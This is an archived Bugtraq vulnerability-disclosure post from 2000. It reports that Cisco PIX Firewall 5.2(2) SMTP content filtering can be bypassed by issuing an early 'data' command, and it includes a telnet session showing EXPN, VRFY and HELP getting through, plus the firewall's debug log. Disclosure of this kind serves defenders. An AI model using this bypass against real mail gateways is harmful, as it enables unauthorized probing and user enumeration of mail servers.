[17024] in bugtraq
Re: Cisco PIX Firewall (smtp content filtering hack) [Finally
daemon@ATHENA.MIT.EDU (Fabio Pietrosanti (naif))
Tue Oct 3 14:08:00 2000
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0010031112260.29301-100000@naif.inet.it>
Date: Tue, 3 Oct 2000 11:15:25 +0200
Reply-To: naif@inet.it
From: "Fabio Pietrosanti (naif)" <fabio@TELEMAIL.IT>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <3.0.6.32.20000921162459.007c76b0@mail_server.space.gr>
Hi,
This is the e-mail i sent to Cisco security-alert,
Today Cisco Released 5.2(4) that fix also this bug ...
The Cisco Patch to "SMTP Content Filtering tricks proposed by
naif@inet.it " could be
avoid with the "SMTP Content Filtering tricks proposed by Lincoln Yeoh <
lyeoh@pop.jaring.my >" .
The Little hack posted on bugtraq by me on "Tue, 19 Sep 2000" work because
pix completelly disable the sanity check after "data" command .
Cisco Release the new PIX Versione that we installed on our test pix
5.2(2) .
The Cisco Advisor is:
http://www.cisco.com/warp/public/707/PIXfirewallSMTPfilter-pub.shtml
The i read on bugtraq about a tricks of Jul similar to my advisor :
http://www.securityfocus.com/templates/archive.pike?threads=0&list=1&end=2000-07-09&tid=68903&start=2000-07-03&
So, 5.2(2) should avoid this problem and SMTP content filtering should
work...
Here the our Pix Test:
newpix# sh ver
Cisco Secure PIX Firewall Version 5.2(2)
Compiled on Sun 24-Sep-00 18:59 by morlee
newpix up 19 hours 27 mins
Hardware: SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB
0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10
Licensed Features:
Failover: Enabled
VPN-DES: Enabled
VPN-3DES: Enabled
Maximum Interfaces: 6
Cut-through Proxy: Enabled
Guards: Enabled
Websense: Enabled
Throughput: Unlimited
ISAKMP peers: Unlimited
And the line regarding fixup in the config is:
fixup protocol smtp 25
===== Here the session...
<naif@naif> [~] $ telnet ourtest 25
Trying 10.10.10.2...
Connected to eagletmp.
Escape character is '^]'.
data wow
expn root
vrfy root
help
helo pinco
220 **************************************************2******2000 ******00
*0200 ******
503 Need MAIL command
250 Pinco Pallino <pinco@ourtest.ourdomain.it>
250 <root@ourtest.ourdomain.it>
214-This is Sendmail version 8.9.1
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
250 ourtest.ourdomain.it Hello [10.10.10.10], pleased to meet you
quit
221 ourtest.ourdomain.it closing connection
Connection closed by foreign host.
#### As you can see we could bypass the "fixup smtp"
===== Here Cisco Pix Debug
tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
tcp: SYN out rcvd
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: data command
smtp: entering data mode
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: quit command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp_respond: ERR: bad reply code
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
=====
To Cisco :
Please check carefully also CBAC, because i think that it affect also IOS
CBAC inspect .
I'll release the Advisor for this new version on bugtraq the next week, so
you could release new Pix Version .
On Thu, 21 Sep 2000, Ioannis Migadakis wrote:
> This particular vulnerability is not new.
>
> It has been posted to BUGTRAQ on 9 Jul 2000 by Lincoln Yeoh with a title
> "Out of order SMTP DATA commands incorrectly allow pass-through mode in
> some firewall smtp filters/proxies"
>
> The original post (does not say anything about Cisco PIX) can be found at:
>
> http://www.securityfocus.com/templates/archive.pike?threads=0&list=1&end=200
> 0-07-09&tid=68903&start=2000-07-03&
>
> Ioannis Migadakis
>
naif
